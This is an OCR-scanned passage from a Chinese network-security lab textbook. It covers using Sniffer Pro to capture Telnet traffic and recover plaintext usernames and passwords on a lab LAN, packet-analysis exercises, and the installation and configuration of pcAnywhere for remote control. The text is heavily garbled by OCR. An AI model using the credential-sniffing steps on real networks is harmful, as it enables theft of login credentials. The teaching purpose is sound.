A. 运行 数 据 包 捕 获 功 能 。 
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图 349 定义 Teert 协 议 的 过 滤器 


在 应 用 Telnet 方式 登录 远程 计算 机 之 前 ,需要 开启 Telent 服务 。 如 果 计 算 机 安装 的 


是 Windows 7 操作 系统 , 则 需要 单独 下 载 TELNET. exe 程序 。 在 登录 远程 计算 机 时 , 需 


要 知道 该 计算 机 的 用 户 名 和 密码 


有 关 该 项 目的 测试 ,可 以 选择 在 局 域 网 内 进行 分 组 练习 ,两 人 


方 计 算 机 。 如 图 3. 50 和 图 3. 51 所 示 


-组 ,分别 Telnet 到 对 


in using NTLM a 


图 350 


由 于 Telnet 登录 时 口令 部 分 不 回 显 ， 
- 般 嗅 探 软件 无 法 直接 看 到 口令 。 
入 模式 ,而 非 行 输入 模式 ,此 时 基本 上 是 客户 端 一 有 击 键 就 立即 向 服务 器 发 送 字符 ， 
-个 字 节 。 如 图 3. 52 所 示 为 嗅 探 的 结果 


文 口令 ,所 以 


字 


TCP 数据 区 就 存储 


远程 登录 界面 
只 能 抓 取 从 Client 到 Server 的 报 文才 能 获取 明 
默认 情况 下 ,Telnet 登录 时 进入 字符 输 


客户 端 Telnet 到 服务 器 端 时 ， 
的 ,所 


Telnet 192.168.1.225 
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351 远程 连接 成 功 
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“administrator”, 密码 为 “123456”。 
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-次 只 传送 一 个 字 节 的 数据 ;由 于 协议 的 头 长 度 是 
J Telnet 的 数据 包 大 小 二 DLC(14 字 节 ) 十 IP(20 字 节 ) 十 TCP(20 字 节 ) 十 数据 (1 字 
5 个 字 节 ,因此 ,可 以 将 图 3. 49 AY Packet Size 设 为 55, 以 便 捕获 到 用 户 名 和 密码 ;如 
53 所 示 , 设 定 为 仅 捕获 客户 端 到 服务 器 端的 数据 包 «33 
F 次 重复 捕获 过 程 , 即 可 显示 用 户 名 和 明文 密码 .如 图 


滤 其 他 类 型 的 干扰 数据 包 。 
54 所 示 , 用 户 名 为 
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Known Address: Dragable) 
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图 354 用 户 名 和 明文 密码 


思考 题 
(1) 如 何 捕获 HTTP 协议 下 的 用 户 名 和 密码 ? 
(2) 分 析 TCP 协议 的 头 结构 ,以 及 两 台 主 机 之 间 建 立 连接 的 过 程 。 
实验 报告 要 求 
° 实验 目的 。 
附 上 实验 过 程 的 截图 和 结果 截图 。 
о 阐述 碰 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 
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3.3.4 多 协议 综合 实验 
实验 器 材 
。 Sniffer Pro 软件 系统 1 套 。 
e PC(Windows XP/Windows 7)1 &. 
预习 要 求 
。 做 好 实验 预习 ,复习 网 络 协议 有 关内 容 。 
。 复习 Sniffer 软件 的 操作 方法 。 
。 熟悉 实验 过 程 和 基本 操作 流程 。 
。 做 好 预习 报告 。 
实验 任务 
通过 本 实验 ,理解 和 掌握 Sniffer 的 综合 应 用 ;明确 FTP、TCP、ICMP 等 多 种 协议 的 
数据 传输 问题 ;理解 主要 协议 的 结构 。 
实验 环境 
本 实验 采用 一 个 已 经 连接 并 配置 好 的 局 域 网 环境 。 所 有 PC 上 安装 的 都 是 Windows 
操作 系统 。 本 次 实验 需 在 小 组 合作 的 基础 之 上 完成 。 每 个 小 组 由 两 位 成 员 组 成 ,相互 之 
间 通 信 , 通 过 Sniffer 工具 截取 通信 数据 包 , 分 析 数 据 包 完成 实验 内 容 。 
实验 步 又 
CD 填写 小 组 情况 表 , 通 过 ipconfig 命令 获取 本 机 IP 地 址 ,并 填写 表 3. 4。 
表 3.4 小 组 情况 表 


小 组 成 员 姓 名 机 器 IP 地 址 本 机 用 户 名 
A 192. 168. 1. 136 User36 
B 192. 168, 1. 137 User37 


(2) 开启 Sniffer Pro 软件 , 自 定义 过 滤器 设置 ,并 进入 捕获 状态 。 
(3) 从 本 机 ping 小 组 另 一 位 成 员 的 计算 机 ,使 用 Sniffer 截取 ping 过 程 中 的 通信 数据 。 
(4) 分 析 第 (3) 步 操作 从 本 机 发 送 到 目标 机 器 的 IP 数据 ,并 填写 表 3. 5。 
表 3.5 IP MERE 
IP 协议 版 本 号 (IPv4/IPv6) 


服务 类 型 (使 用 中 文明 确 说 明 服务 类 型 ,比如 “要 求 最 大 吞吐 量 ”)/b 
IP 报 文 头 长 度 /bytes 

数据 报 总 长 度 /bytes 

标识 


数据 报 是 否 要 求 分 段 


+ 82 


分 段 偏 移 量 

在 发 送 过 程 中 经 过 几 个 路 由 器 
上 层 协 议 名 称 (ICMP) 

报 文 头 校 验 和 

源 地 址 (IP) 

目标 地 址 (IP) 


(5) 分 析 第 (3) 步 操作 从 目标 机 器 返回 到 本 机 的 数据 帧 中 的 IP 数据 报 ,并 填写 表 
3.5。 


(6) 从 本 机 通过 telnet 命令 远程 登录 小 组 另 一 位 成 员 的 计算 机 ,然后 使 用 dir 文件 查 
看 对 方 C 盘 根 目 录 下 的 文件 系统 结构 ,最 后 使 用 exit 命令 退出 。 使 用 Sniffer 截取 操作 中 
的 通信 数据 。 
(7) 分 析 第 (6) 步 操作 从 本 机 发 送 到 目标 机 器 的 数据 帧 中 的 TCP 数据 ,填写 表 3.6. 
表 3.6 通信 报表 
数据 发 送 端口 号 
通信 目标 端口 号 
TCP 报 文 序号 
TCP 报 文 确 认 号 
下 一 个 TCP 报 文 序号 
标志 位 含义 (如 “确认 序号 有 效 ”) 
窗口 大 小 
校 验 和 
源 IP 地 址 
目标 IP 地 址 


(8) 分 析 第 (6) 步 操作 从 目标 机 器 返回 到 本 机 的 数据 帧 中 的 ТСР 数据 ,并 填写 
# 3.6。 

实验 报告 要 求 

。 实 验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 

。 阐述 碰 到 的 问题 以 及 解决 方法 。 

。 阐述 收获 与 体会 。 
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第 4 章 ”运程 控制 实验 


4.1 远程 控制 原理 


所 谓 远程 控制 ,是 指 管理 人 员 在 异地 通过 计算 机 网 络 联通 被 控制 的 计算 机 ,将 被 控 计 
算 机 的 桌面 环境 显示 到 自己 的 计算 机 上 ,通过 本 地 计算 机 对 远 端 计算 机 进行 配置 .软件 安 
装 、 文 件 编辑 等 工作 。 这 里 的 远程 指 的 是 通过 网 络 控制 远 端 计算 机 。 当 操作 者 使 用 主 控 
计算 机 控制 被 控 端 计算 机 时 ,可 以 启动 被 控 端 计 算 机 的 应 用 程序 ,使 用 被 控 端 的 文件 资 
料 ,甚至 可 以 利用 被 控 端 计算 机 的 外 部 设备 和 通信 设备 来 进行 工作 。 

远程 控制 必须 通过 网 络 才能 进行 。 位 于 本 地 的 计算 机 是 操纵 指令 的 发 出 端 , 称 为 主 
控 端 或 客户 端 ; 非 本 地 的 被 控 计算 机 叫做 被 控 端 或 服务 器 端 。 


4.1.1 远程 控制 技术 


随 着 网 络 的 快速 发 展 ,为 满足 计算 机 管理 及 技术 支持 需要 ,远程 操作 及 控制 技术 越 来 
越 引 起 人 们 的 关注 。 远 程控 制 支持 多 种 网 络 方式 : ТАМ, МАМ, 拨号 方式 及 互联 网 方式 。 
此 外 ,远程 控制 还 支持 通过 串口 .并口 ` 红 外 端口 来 对 目标 主机 进行 控制 。 传 统 的 远程 控 
制 技 术 一 般 使 用 NETBEUI、NETBIOS、IPX/SPX、TCP/IP 等 协议 来 实现 ,此 外 ,还 支持 
Java 技术 ,实现 不 同 操作 系统 下 的 远程 控制 。 远 程控 制 的 工作 原理 如 图 4. 1 所 示 。 


"EI BEC 
D A Ons 


图 41 远程 控制 的 工作 原理 


远程 控制 由 两 部 分 组 成 : 客户 端 程序 (Client) 和 服务 器 端 程序 (Server)。 在 进行 远 
程控 制 前 ,需要 事先 将 客户 端 程序 安装 到 主 控 端 计算 机 上 ,服务 器 端 程序 安装 到 被 控 端 计 
算 机 上 。 对 于 Windows XP 或 Windows Server 2003 操作 系统 而 言 , 可 以 利用 随机 自 带 
的 系统 程序 实现 远程 控制 。 

远程 控制 的 过 程 是 先 在 主 控 端 计算 机 上 执行 客户 端 程序 ,向 被 控 端 计算 机 中 的 服务 
器 端 程序 发 出 信号 ,建立 一 个 特殊 的 远程 服务 ;通过 这 个 远程 服务 ,使 用 远程 控制 功能 发 
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送 远程 控制 命令 ,控制 被 控 端 计算 机 运行 
4.1.2 远程 控制 方式 


远程 控制 的 实现 方式 通常 有 两 种 : 点 对 点 方式 和 点 对 多 点 方式 。 

如 图 4. 2 所 示 ,Windows XP 或 Windows Server 2003 操作 系统 的 主机 通常 采用 点 对 
点 工作 方式 。 点 对 点 控制 指 的 是 一 个 远程 客户 端的 程序 在 同一 时 间 内 只 能 连接 并 控制 唯 
一 一 台 远 程 计算 机 。 点 对 点 控制 程序 的 工作 模式 是 客户 端 控制 服务 器 端 ,这 也 是 远程 访 
问 控 制 中 运用 最 普遍 的 情况 。 点 对 点 的 访问 控制 主要 应 用 于 对 远程 主机 进行 具体 控制 和 


交换 机 交换 机 
Кы 传送 数据 包 ES 
& D, 

S> 
ЭТ 主 控油 计算 机 


图 42 远程 控制 的 点 对 点 方式 


一 些 专 业 软 件 , 如 远程 控制 软件 pcAnywhere, 可 以 借助 局 域 网 优势 用 一 台 计 算 机 控 
制 多 台 计 算 机 ,实现 对 远程 主机 的 多 点 控制 ,如 图 4. 3 所 示 。 点 对 多 点 的 访问 控制 可 以 在 
同一 时 间 内 对 一 台 或 多 台 远 程 计 算 机 进行 控制 ,但 点 对 多 点 的 访问 控制 机 制 并 不 会 比 点 
对 点 的 访问 控制 功能 更 加 具体 和 强大 。 点 对 多 点 的 访问 控制 流程 和 点 对 点 相反 ,首先 由 
每 个 客户 端 程序 向 服务 器 端 程序 发 出 连接 请 求 ,建立 连接 之 后 ,服务 器 端 就 可 以 对 多 台 远 
程 计算 机 的 客户 端 程序 发 出 指令 并 由 客户 端 程序 执行 指令 。 点 对 多 点 的 访问 控制 主要 应 
用 于 控制 大 范围 计算 机 领域 ,诸如 定时 、 收 费 、 监 督 等 需求 。 


传送 数据 包 
被 近江 计算 
传送 数据 包 EJ 
主 按 端 计算 机 ет 


传送 数据 包 


Wen LER 
图 43 远程 控制 的 点 对 多 点 方式 
远程 控制 在 计算 机 网 络 管理 与 维护 中 应 用 相当 普遍 ,网 络 管理 员 可 以 接 和 人 局域网 中 


的 任意 一 台 计 算 机 ,通过 远程 控制 方式 对 网 内 服务 器 等 设备 进行 管理 和 维护 ,实现 在 服务 
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器 上 进行 软件 安装 .系统 升级 ,数据 备份 以 及 日 志 查 看 等 功能 。 
4.1.3 远程 控制 软件 


随 着 数字 信息 处 理 需 求 越 来 越 广泛 ,远程 控制 越 来 越 多 地 被 应 用 到 人 类 生活 和 办 公 
当中 ,这 其 中 包括 三 款 国内 外 著名 的 远程 控制 软件 。 


4.1.3.1 软件 简介 

1. DLinkPC( 中 国 ) 

DLinkPC 是 一 款 目前 国内 集 远 程控 制 .远程 开 关机 、 监控 和 VPN 为 一 体 的 远程 服务 平 
台 。 只 要 申请 用 户 名 ,在 被 控制 的 计算 机 里 运行 被 控 端 ,登录 后 设置 好 远程 访问 的 密码 ,就 
可 用 主 控 端 ,通过 相同 的 用 户 名 和 远程 访问 密码 进行 远程 桌面 控制 、 下 载 / 上 传 文件 。 

2. TeamViewer( 德 国 ) 

TeamViewer 可 以 在 任何 防火 墙 和 NAT 代理 后 台 进 行 远程 控制 .桌面 共享 和 文件 传 
输 。 为 了 连接 到 另 一 台 计 算 机 ,需要 在 两 台 计 算 机 上 同时 运行 TeamViewer。 软 件 第 一 
次 启动 时 ,在 两 台 计 算 机 上 自动 生成 伙伴 ID ,只 需要 输入 伙伴 ID. Team Viewer 就 会 立即 
建立 起 连接 。 这 款 软 件 是 至 今 唯 一 的 一 款 能 穿 透 内 网 的 远程 控制 软件 ,可 以 穿 透 各 种 防 
火 墙 ,任何 一 方 都 不 需要 拥有 国定 TP 地 址 ,双方 可 以 相互 控制 。 

3. pcAnywhere( 美 国 ) 

pcAnywhere 是 一 款 独特 的 集成 解决 方案 , 它 结合 了 远程 控制 .远程 管理 .高 级 文件 
传输 功能 和 强健 的 安全 性 ,可 以 提高 技术 支持 效率 并 减少 呼叫 次 数 。 使 用 pcAnywhere 
可 实现 对 Linux 和 Windows 系统 的 远程 管理 ,从 而 避免 使 用 命令 行 工具 。 使 用 被 控 端 
会 议 功能 ,可 以 建立 起 一 个 pcAnywhere 被 控 端 的 多 个 并 发 远程 连接 。 


4.1.3.2 性 能 比较 

1, 安全 性 对 比 

(D DLinkPC, 登录 被 控 端 软件 后 ,需要 设置 一 系列 安全 选项 (如 远程 访问 权限 、 远 
程 访问 功能 .远程 访问 密码 等 ) ,如 图 4.4 所 示 。 
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(2) TeamViewer : 在 软件 选项 中 设置 固定 密码 , 既 增 加 安全 性 ,又 确保 密码 不 会 变 
化 。 根 据 安全 级 别 设置 访问 权限 ,限制 控制 方 的 操作 权限 ,如 图 4. 5 所 示 。 
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在 Teamviewer 里 安全 和 隐私 是 非常 重要 的 
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图 45 TeanMewer 访问 设置 


(3) pcAnywhere: 允许 被 控 方 主动 设置 用 户 名 、 密 码 ;在 主 控 端 ,可 以 设置 连接 时 的 
加 密级 别 ,为 主 控 端 设 定 密码 ,提高 远程 访问 过 程 的 安全 性 。 

2. 服务 器 响应 速度 对 比 

服务 器 响应 速度 如 表 4. 1 所 示 。 


表 4.1 服务 器 响应 速度 


软件 名 称 服务 器 响应 时 间 软件 名 称 服务 器 响应 时 间 
DLinkPC 3 一 8 秒 pcAnywhere 不 需要 服务 器 
TeamViewer 5—8 秒 


3. 操作 方式 对 比 
(1) DLinkPC: 软件 分 为 主 控 端 .被 控 端 以 及 临时 客户 端 三 个 部 分 。 在 网 站 上 注册 
好 账号 ,登录 两 端 程序 ,就 可 以 在 列表 中 看 到 被 控 端 上 线 , 并 进行 控制 。 如 果 没 有 申请 账 


号 可 以 让 控制 端 生 
(2) TeamViewer: 软件 把 两 端的 功能 进行 整合 ,软件 安装 后 


成 临时 账号 ,在 临时 客户 端 登录 ,也 能 进行 控制 。 


的 主机 既 可 作为 主 


控 端 ,也 可 作为 被 控 端 。 只 要 


得 到 对 方 的 ID 以 及 密码 ,就 可 以 进行 远程 协助 或 者 


控制 。 

(3) pcAnywhere: 程序 必须 同时 安装 在 主 控 和 被 控 计 算 机 中 。 在 主 控 端 计算 机 中 ， 
可 通过 “联机 向 导 ” 命 令 , 利 用 随后 打开 的 向 导 对 话 框 去 创建 主 控 端 ,与 主 控 端的 创建 方式 
不 同 , 在 创建 被 控 端 向 导 中 可 设 定 连接 的 用 户 名 及 密码 。 
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pcAnywhere 是 赛 门 铁 克 公司 的 著名 产品 ,该 软件 适用 于 所 有 版 本 的 Windows 操作 
系统 。 该 软件 的 使 用 与 管理 方式 比较 灵活 ,用 户 可 以 按照 自己 的 需要 单独 安装 主 控 端 或 
被 控 端 的 软件 ,根据 需要 在 被 控 端 上 创建 各 种 连接 下 的 远程 控制 方案 ,并 能 根据 不 同 的 用 
户 分 配 不 同等 级 的 权限 。 在 安全 性 能 方面 , pcAnywhere 提供 了 多 种 验证 方式 和 加 密 方 
式 , 用 户 可 以 直接 使 用 网 络 系 统 的 用 户 资料 库 验 证 远程 连接 ,也 可 以 创建 独立 的 远程 控制 
账户 ,根据 需要 选择 加 密 数 据 方式 ,保证 传输 过 程 中 数据 不 被 窃取 。 

3 种 软件 性 能 的 整体 对 比如 表 4. 2 所 示 。 


主要 功能 


表 4.2 软件 主要 功能 
DLinkPC 


TeamViewer 


pcAnywhere 


远程 开机 
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远程 控制 桌面 


远程 复制 .粘贴 文字 


У 
У 


允许 多 重 连接 


v 
v 
/ 


x 


У 
У 
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Windows 账户 验证 


x 


х 


文件 管理 (文件 上 传 . 下 载 ) 


文件 搜索 功能 


文件 断 点 续 传 


语音 视频 


桌面 .视频 、 语 音 录像 


VPN 


自动 升级 


查看 登录 记录 


隐 性 功能 (隐藏 软件 ) 


强制 中 转 ( 穿 透 代理 上 网 ) 


4.2 pcAnywhere 远程 控制 实例 


4.2.1 


软件 的 安装 与 使 用 


实验 器 材 
。 pcAnywhere 软件 系统 1 套 。 
* PC(Windows XP/Windows 7)1 6. 
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预习 要 求 
。 做 好 实验 预习 ,复习 远程 控制 技术 的 有 关内 容 。 
。 复习 pcAnywhere 软件 的 操作 方法 。 
。 熟悉 实验 过 程 和 基本 操作 流程 。 
。 做 好 预习 报告 。 
实验 任务 
通过 本 实验 ,学 会 在 Windows 环境 下 安装 pcAnywhere。 
实验 环境 
本 实验 采用 一 个 已 经 连接 并 配置 好 的 局 域 网 环境 。PC 上 安装 Windows 操作 
系统 。 
预备 知识 
。 远程 控制 原理 及 基本 协议 。 
。 远程 控制 技术 概念 及 原理 。 
S A a 
pcAnywhere 275) Full, Host 以 及 Remote 等 版 本 ,可 以 根据 实际 需要 选择 不 同 的 版 
本 来 安装 。 本 实验 所 使 用 的 pcAnywhere 的 版 本 是 V12.5。 


(1) 打开 pcAnywhere V12. 5 的 主 安装 文件 Symantec pcAnywhere v12. 5. exe, ЖЛ 
安装 界面 ,如 图 4. 6 所 示 。 


ze" Symantec pcAnywhere 安装 


Instalshield(R) Symantec pcAnywhere 到 您 的 计 
算 机 中 。 想 雪 继 续 ， = 


图 46 ”pcAnywhere 安 装 界面 
(2) 在 许可 协议 中 选择 “我 接受 许可 协议 中 的 条 款 ”, 并 单 击 “ 下 一 步 ” 按 钮 。 
(3) 在 客户 信息 中 填写 "用户 名 ”和 “组 织 ”, 如 图 4.7 所 示 。 
(4) 在 “安装 位 置 设置 ?中 选择 pcAnywhere 的 安装 磁盘 位 置 ,默认 路 径 即 可 。 
G) 在 “ 自 定义 安装 ”的 自 定义 设置 中 ,作为 主机 管理 员 , 可 以 选择 典型 安装 , 即 主机 
管理 员 和 主机 管理 员 代理 ;但 作为 被 控 端 ,需要 同时 选择 这 两 项 ,如 图 4. 8 所 示 。 
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图 47 填写 用 户 名 和 机 构 名 称 注册 


Dyin 
FREES роон з Шш шш AFER Windows Vista 验证 需求 ， 主机 管理 员 


功能 大 小 需求 
此 功能 需要 174 KB 硬盘 空间 。 


图 48 安装 代理 管理 工具 


(6) 选中 Symantec pcAnywhere, 意 思 是 在 桌面 上 放置 pcAnywhere 的 快捷 方式 , 单 
击 “ 下 一 步 " 按 钮 。 

(7) 安装 pcAnywhere 的 主要 程序 ,完成 pcAnywhere 的 安装 。 

(8) 打开 桌面 上 的 图 标 Symantec pcAnywhere, 如 图 4. 9 所 示 。 

(9) 单 击 “ 转 到 高 级 视图 ”选项 ,界面 左 侧 会 有 各 种 选择 项 ,如 图 4. 10 所 示 。 

实验 报告 要 求 

。 实 验 目的 。 

* 附 上 实验 过 程 的 截图 和 结果 截图 。 

。 阐述 碰 到 的 问题 以 及 解决 方法 。 

。 阐述 收获 与 体会 。 
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pcAnywhere 管理 器 Ө @ 
= 基本 视图 启动 
快速 连接 


操作 
B esseom 


p 编辑 文件 传送 设置 
编辑 主机 设置 


eae o 


49 运行 界面 


Direct 
File Transfer 


а, 
Cable, DSL 


hi. 
н, 
Remote Management 


192, 168, 1.240 


图 410 ”pcAnywhere 高 级 视图 


4.2.2 配置 被 控 端 (hosts) 


实验 器 材 
。 pcAnywhere 软件 系统 1 套 。 
* PC(Windows XP/Windows 7)1 6. 


Газах 
运程 控制 


文件 传送 
运程 控制 
运程 控制 
运程 管理 
运程 控制 
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预习 要 求 

。 做 好 实验 预习 ,复习 远程 控制 技术 的 有 关内 容 。 

。 复习 pcAnywhere 软件 的 操作 方法 。 

。 熟悉 实验 过 程 和 基本 操作 流程 。 

。 做 好 预习 报告 。 

实验 任务 

通过 本 实验 ,学 会 在 Windows 环境 下 安装 pcAnywhere 被 控 端 。 

实验 环境 

本 实验 采用 一 个 已 经 连接 并 配置 好 的 局 域 网 环境 。PC 上 安装 Windows 操作 系统 。 
预备 知识 

。 远程 控制 原理 及 基本 协议 。 

。 远程 控制 技术 概念 及 原理 。 

See АН 

CD 选择 界面 中 的 主机 后 , 单 击 添加 功能 ,进入 被 控 端 的 连接 向 导 ,选择 “我 想 使 用 电 


缆 调 制 解 调 器 /DSLVLAN/V 拨 号 互联 网 ISP” 单 选项 , 单 击 “ 下 一 步 ” 按 钮 ,如 图 4. 11 所 示 。 


жава јав») 


С 我 想 使 用 电 综 调制解调器 /DSL/LAN/ 找 号 互联 网 ISP (C) o 
с а 


© 要 了 解 关于 不 同 连接 方法 的 更 多 信息 ， 请 单 击 “ 帮 助 


танх, жант o 


CE [nop >] 取消 ] 帮助 | 
图 411 添加 被 控 端 选项 


(2) 选择 连接 模式 ,选择 "等待 有 人 呼叫 我 ”。 
(3) 在 验证 类 型 中 选择 第 一 个 选项 则 使 用 Windows 现 有 账户 ,选择 第 二 个 选项 则 是 


创建 pcAnywhere 新 的 用 户 和 密码 ,如 图 4. 12 所 示 。 


(4) 在 此 过 程 中 ,需要 选择 Windows 用 户 , 如 图 4. 13 所 示 。 
(5) 单 击 “ 下 一 步 ” 按 钮 ,默认 创建 完成 。 允 许 用 户 再 次 确认 连接 选择 ,并 选择 是 否 连 


接 完 成 后 等 待 来 自 远 程 计算 机 的 连接 。 在 创建 完 后 程序 会 提示 对 新 主机 进行 命名 ,例如 ， 
命名 为 “student”。 右 击 需 要 配置 的 连接 项 目 , 选 择 “ 属 性 ”窗口 ,更 改 属性 ,如 图 4. 14 
所 示 。 


. 92. 


444 属性 配置 窗口 
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(D 连接 信息 : 指 的 是 建立 连接 时 所 使 用 的 协议 。 一 般 默认 TCP/IP, 可 以 根据 实际 
需要 选择 合适 的 协议 ,本 实验 以 常见 的 TCP/IP 协议 为 例 ,如 图 4. 15 所 示 。 


“CY- Choose up to two devices for this connection item by checking the boxes 
^ to the left of the device names. 
To customize a device, click the device name and then click Details. 


Detsils 


Device list: 


C ISDN via CAPI 2.0 


mum | mmo ий 
图 415 确定 连接 协议 


© 设置 : 远程 控制 中 ,被 控制 端 只 有 建立 安全 机 制 ,才能 有 效 地 保护 系统 不 被 恶意 
控制 所 破坏 。 
。“ 随 Window 一 起 启动 "和 "运行 最 小 化 ” 指 的 是 被 控制 端 配 置 好 以 后 ,决定 是 否 下 
次 启动 计算 机 时 就 直接 启动 pcAnywhere, 并 且 让 pcAnywhere 最 小 化 ,这 是 一 个 
可 以 复 选 的 选项 。 

。“ 会 话 非 正常 结束 后 ” 指 的 是 在 连接 会 话 不 正常 的 情况 下 (比如 连接 突然 中 断 ) ,是 
否 就 放弃 连接 ,还 是 等 待 下 一 次 连接 。 

。“ 且 由 以 下 确保 安全 ” 指 的 是 为 了 保护 本 机 安全 ,可 以 选择 锁定 用 户 , 不 允许 其 他 
的 控制 端 登录 、 重 新 启动 计算 机 等 。 

@ 呼叫 者 : 指 的 是 可 以 创建 连接 到 本 机 的 用 户 账 号 及 密码 。 在 这 里 设置 允许 哪些 
用 户 进行 远程 控制 以 及 分 配 控制 权限 , 单 击 * 新 建 ? 按 钮 ,弹出 设置 新 用 户 的 对 话 框 , 设 置 
好 一 个 新 的 用 户 名 和 登录 密码 ,以 及 相应 的 权限 , 单 击 “ 确 定 ” 按 钮 保存 ,如 图 4. 16 所 示 。 
“验证 类 型 ?选择 pcAnywhere. 

图 中 的 用 户 “teacher” 就 是 在 创建 连接 向 导 时 创建 的 用 户 , 如 果 有 需要 可 以 单 击 红色 
标签 按钮 进行 新 用 户 的 添加 。 同 样 可 以 双击 “用 户 设置 "进行 配置 ,如 修改 管理 密码 (如 图 
4. 17 所 示 ) ,设置 用 户 特权 等 。 

@ 安全 : 指 可 以 设置 本 机 的 安全 策略 。 

。 连接 选项 : 连接 成 功 以 后 ,可 以 选择 是 否 清除 本 机 屏幕 上 的 显示 :是 否 相 隔 确定 

时 间 确 认 一 次 连接 是 否 仍然 有 效 (提示 确认 连接 ) 。 
。 登录 选项 : 可 以 限制 对 本 机 进行 登录 的 次 数 与 时 间 ,默认 值 是 每 个 人 只 允许 登录 
三 次 ,每 一 次 登录 所 用 的 时 间 是 三 分 钟 。 
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47 用 户 特权 设置 


© 保护 项 目 : 允许 用 户 输入 密码 来 保护 当前 设置 的 被 控 端 选项 ,保护 后 任何 人 试图 
查看 或 更 改 该 被 控 端 的 选项 时 ,都 将 需要 输入 密码 来 确认 。 以 上 属性 都 配置 好 以 后 , 单 击 
“确定 ”按钮 完成 被 控 端 设置 。 

右 击 被 控 端 图 标 ,选择 “运用 主机 ”, 被 控 端 将 启动 并 在 系统 任务 栏 上 显示 一 个 计算 机 
形状 的 图 标 , 开 始 等 待 远程 控制 的 主 控 端 进行 连接 。 当 用 户 远程 连接 时 ,图 标 改变 颜色 。 

实验 报告 要 求 

”实验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 

。 阅 述 碰 到 的 问题 以 及 解决 方法 。 

Мику. 


. 95 。 


4.2.3 ”配置 主 控 端 (Remotes) 

实验 器 材 

。 pcAnywhere 软件 系统 1 Ж. 

* PC(Windows XP/Windows 7)1 #. 

预习 要 求 

。 做 好 实验 预习 ,复习 远程 控制 技术 的 有 关内 容 。 

。 复习 pcAnywhere 软件 的 操作 方法 。 

* 熟悉 实验 过 程 和 基本 操作 流程 。 

。 做 好 预习 报告 。 

实验 任务 

通过 本 实验 ,学 会 在 Windows 环境 下 安装 pcAnywhere 的 主 控 端 。 

实验 环境 

本 实验 采用 一 个 已 经 连接 并 配置 好 的 局 域 网 环境 。PC 上 安装 Windows 操作 

系统 。 

预备 知识 

。 远程 控制 原理 及 基本 协议 。 

。 远程 控制 技术 概念 及 原理 。 

FM 

设置 好 被 控 端 后 , 另 一 项 十 分 重要 的 工作 就 是 配置 主 控 端 计算 机 。 

(1) 在 管理 窗口 中 , 单 击 “远程 ”, 通 过 这 个 页 面 可 以 完成 主 控 端 连接 项 目的 设置 。 单 

击 下 面 的 “添加 ”按钮 ,在 向 导 中 输入 被 控 端 计算 机 的 IP 地 址 ,如 图 4. 18 所 示 。 


您 要 连接 的 计算 机 的 Ip 地 址 是 什么 CI)? 
fise. 168. 1. 240 


ee 


要 继续 ， 请 单 击 “下 一 步 。 


< t-50 [r— 05 > 取消 | NE: | 
图 46 指定 被 控 计 算 机 


单 击 “ 下 一 步 ” 按 钮 完成 控制 端的 添加 .程序 提示 对 名 称 进行 重 命名 ,例如 student, 
(2) 右 击 需 要 配置 的 连接 项 目 ,选择 “属性 ”, 弹 出 配置 窗口 。 对 话 框 中 共有 五 个 选项 
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卡 可 供 设置 。 

O 连接 信息 : 设置 方式 和 内 容 与 被 控 端 的 设置 基本 相同 ,如 图 4. 19 所 示 。 不 同 的 是 
主 控 端 只 能 够 选择 一 种 连接 方式 ,同时 在 选项 卡 上 还 可 以 设置 “开始 模式 ”, 如 其 中 的 “ 文 
件 传输 ” 复 选 框 , 选 中 之 后 可 以 达到 与 被 控 端 连接 时 直接 进入 文件 传输 界面 ,而 不 进入 远 
程 操 作 界面 的 效果 。 


详细 信息 OD). 


вий 
© iie 


C 远程 管理 0 
С 文件 传送 外) 


口 合用 CAPI 2.0 的 ISDN ГТ 通过 网 关 或 Access Server ЕВ 6) 


详细 信息 OD... 


取消 TAW mem | 
图 4 但 连接 信息 设置 


Q 设置 : 用 于 配置 远程 连接 选项 。 其 中 :“ 要 控制 的 网 络 被 控 端 PC sk IP 地址 ” 填 
入 受 控制 的 远程 计算 机 的 主机 名 或 者 ТР 地 址 。 设 置 如 图 4. 20 所 示 。 


C 要 控制 的 网 络 主机 FC 或 IP 地 址 0D 192. 168. 1.240 
С 使 用 目录 服务 B) ed Be 
广 要 控制 的 主机 РС 的 电话 号 码 
G 使 用 挡 号 属性 和 电话 号 码 0 (2880)... | 
Ба CB) BERO ЫЕ С) 


ihe 中 国 (88) 
C 使 用 手动 输入 的 前 绍 ， 区 域 代码 和 电话 号 码 M: 


| 上 登录 信息 

| | Г 连接 后 自动 登录 到 主机 N 
BRE): 

ZAP: 

Ho: 

| -连接 选项 
Егер 


图 420 远程 控制 
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。“ 要 控制 的 主机 PC 的 电话 号 码 ” 如 果 远 程 计算 机 采用 Modem 拨号 呼叫 的 话 ， 
在 这 里 就 要 填 人 远程 计算 机 的 电话 号 码 , 如 图 4. 20 所 示 。 
。“ 登 录 信 息 ” 连 接 后 自动 登录 到 被 控 端 , 添 人 完整 的 登录 信息 后 ,就 可 以 保存 登录 
到 远程 被 控 端 所 需 的 用 户 账号 与 密码 ,而 实现 自动 登录 。 
其 中 ,192. 168. 1. 240 是 被 控 端 的 IP 地 址 ,student 为 对 方 的 用 户 名 。 
@ 自动 化 任务 : 用 于 设置 使 用 该 连接 的 自动 化 任务 。 在 12.5 版 本 中 弱化 了 这 个 功 
能 ,主要 是 将 远程 控制 过 程 中 的 操作 记录 下 来 ,在 需要 的 时 候 回 放 查 看 。 
Ф 安全 选项 : 用 于 设置 主 控 端 在 远程 控制 过 程 中 使 用 的 加 密级 别 , 默 认 是 不 加 密 
的 。 可 以 按 自己 的 需要 选择 使 用 对 称 密 钥 、 公 用 密 钥 或 pcAnywhere 加 密 方式 ,其 中 ， 
pcAnywhere 加 密 方式 将 前 面 的 两 种 加 密 技 术 结 合 在 一 起 ,具有 速度 和 安全 性 两 方面 的 
优点 。 
© 保护 项 目 : 功能 与 被 控 端的 设置 相同 。 
G) 设置 完毕 后 , 右 击 主 控 端 ,选择 “开始 远程 控制 ”>, 即 可 自动 连接 至 远程 主机 的 桌 
面 实现 安全 的 桌面 远程 操作 。 
作为 被 控 端 ,在 主机 中 双击 新 建 主机 (student) 即 可 ,任务 栏 的 右 下 角 会 有 图 标 提示 。 
作为 主 控 端 ,选中 远程 中 的 student, 单 击 左 侧 的 启动 连接 或 者 双击 student, 出 现 如 
图 4.21 所 示 界 面 。 用 户 名 就 是 登录 名 teacher, 密 码 就 是 登录 密码 123456。 启 动 远程 控 


| 正在 连接 到 192. 168. 1.240 
